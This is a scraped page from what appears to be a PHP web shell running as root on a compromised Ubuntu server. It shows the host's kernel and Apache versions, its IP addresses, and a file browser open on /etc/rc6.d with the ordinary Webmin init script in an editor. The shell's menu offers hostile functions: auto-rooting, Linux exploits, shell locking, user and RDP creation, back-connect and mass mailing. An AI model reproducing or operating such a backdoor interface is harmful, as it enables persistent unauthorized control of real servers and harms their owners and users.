Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
rc6.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01apache-htcacheclean
2.43
KB
-rwxr-xr-x
K01apache2
7.95
KB
-rwxr-xr-x
K01irqbalance
2.39
KB
-rwxr-xr-x
K01mysql
5.48
KB
-rwxr-xr-x
K01plymouth
1.33
KB
-rwxr-xr-x
K01rsyslog
2.8
KB
-rwxr-xr-x
K01unattended-upgrades
1.36
KB
-rwxr-xr-x
K01uuidd
1.28
KB
-rwxr-xr-x
K10webmin
1.81
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : K10webmin
#!/bin/sh # chkconfig: 235 99 10 # description: web-based administration interface for Unix systems # ### BEGIN INIT INFO # Provides: webmin # Required-Start: $local_fs $network $syslog # Required-Stop: $local_fs $network # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: web-based administration interface for Unix systems # Description: Webmin is a web-based interface for system administration # for Unix. Using Webmin you can configure DNS, Samba, NFS, # local/remote filesystems and more using your web browser. ### END INIT INFO PATH=/sbin:/usr/sbin:/bin:/usr/bin DESC="web-based administration interface for Unix systems" NAME=Webmin PIDFILE=/var/webmin/miniserv.pid SCRIPTNAME=/etc/init.d/$NAME START=/etc/webmin/start STOP=/etc/webmin/stop RELOAD=/etc/webmin/reload LOCKFILE=/var/lock/subsys/webmin CONFFILE=/etc/webmin/miniserv.conf case "$1" in start) $START >/dev/null 2>&1 </dev/null RETVAL=$? if [ "$RETVAL" = "0" ]; then touch $LOCKFILE >/dev/null 2>&1 fi ;; stop) $STOP RETVAL=$? if [ "$RETVAL" = "0" ]; then rm -f $LOCKFILE fi pidfile=`grep "^pidfile=" $CONFFILE | sed -e 's/pidfile=//g'` if [ "$pidfile" = "" ]; then pidfile=$PIDFILE fi rm -f $pidfile ;; status) pidfile=`grep "^pidfile=" $CONFFILE | sed -e 's/pidfile=//g'` if [ "$pidfile" = "" ]; then pidfile=$PIDFILE fi if [ -s $pidfile ]; then pid=`cat $pidfile` kill -0 $pid >/dev/null 2>&1 if [ "$?" = "0" ]; then echo "$NAME (pid $pid) is running" RETVAL=0 else echo "$NAME is stopped" RETVAL=1 fi else echo "$NAME is stopped" RETVAL=1 fi ;; restart) $STOP ; $START RETVAL=$? ;; reload|force-reload) $RELOAD RETVAL=$? ;; *) echo "Usage: $0 {start|stop|restart|reload|force-reload|status}" >&2 RETVAL=1 ;; esac exit $RETVAL
Close